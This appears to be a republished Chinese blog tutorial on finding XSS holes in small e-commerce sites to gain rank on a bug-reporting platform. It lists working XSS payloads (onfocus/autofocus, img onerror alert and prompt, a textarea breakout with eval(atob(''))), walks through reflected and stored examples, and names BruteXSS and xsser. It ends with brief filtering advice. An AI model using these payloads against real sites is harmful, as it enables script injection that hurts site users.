温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

如何利用xss漏洞shua盒子rank的

发布时间:2021-12-22 15:38:58 来源:亿速云 阅读:108 作者:柒染 栏目:网络安全

这篇文章给大家介绍如何利用xss漏洞shua盒子rank的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。

我们来挖小商城的xss,因为商城的xss输入点多

01

第一步:

搜索框判断:

onfocus=alert1 autofocus            

那两个是反引号,实测可用,在不使用 ‘ ” ( )的情况下,但是一般都要闭合value的 "

“ onfocus=alert('1') autofocus ”

"onclick="alert(1)

"><img src=x onerror=aLert(1)><!--

%22><img src=x onerror=aLert(1)><!--    

(有趣的现象,url编码能绕过简单的反斜杠)

见招拆招了,一般都不会费尽心思过滤什么特殊的字符,都是直接函数过滤

真的过滤了,继续看

1.输入:


如何利用xss漏洞shua盒子rank的

事件判断一波,博主两次遇到一个商城cms,漏了两个事件onuoload(页面关闭时触发),onbblclick(双击时触发)

2.常用的判断一波:


如何利用xss漏洞shua盒子rank的

这都是常用的字符

3.特殊字符判断一波

~!@#$%^&*()_+-={}|:"<>?[]\;',./

一般< > ' "  都过滤的了,有时也会漏下 ‘  ,作者也不是很清楚为什么

02

第二步

如果这简单的搜索框都做的很好,那么自行考虑要不要继续挖掘

作者遇到一个,注册登陆后,它是一个选择题,都过滤了的,但正确选项那个答案没有过滤


如何利用xss漏洞shua盒子rank的

一般就这两个就够了

第三步

说这么多,来两个简单的实战吧(难的,自己也菜的抠脚)

第一个,反射:

http://www.xx.com   

 (就不打码了,就一个简单的反射xss)

输入

">

<img src=x onerror=prompt(1)

>


如何利用xss漏洞shua盒子rank的

输入


如何利用xss漏洞shua盒子rank的

第二个,存储xss

作者找了另一个网站当例子

1.搜索框反射

输入

">

<img src=x onerror=aLert(1)>

<!--

如何利用xss漏洞shua盒子rank的

2.存在存储xss

12">

</textarea>

 <img src=x onerror=eval(atob(''))>

<!--

如何利用xss漏洞shua盒子rank的


如何利用xss漏洞shua盒子rank的

按着作者的方法,只要你有耐心和时间,rank真的问题不大,有图有真相,

如何利用xss漏洞shua盒子rank的

xss工具

1.github脚本

来自一位前辈的收集

如何利用xss漏洞shua盒子rank的

简单测试过,把其他的脚本payload转移到了BruteXSS里,其他的作者用起来效果不是很好(可能没有找到使用方法吧)

就是上文的 prompt  (有点小瑕疵就是,误报,误报后就停止了,还在思考解决)

如何利用xss漏洞shua盒子rank的

2.xsser,kali自带的一款工具,由于作者没有研究过,就不扩展讨论了

xss防御

作者的浅薄见解

很粗暴的方法:输入实体化,敏感词过滤

作者见过一个cms的过滤是这样的,on开头过滤掉(现在想来应该没有过滤完),script,src,img,iframe,ifame等敏感可引入词过滤,再加上输入实体化

关于如何利用xss漏洞shua盒子rank的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI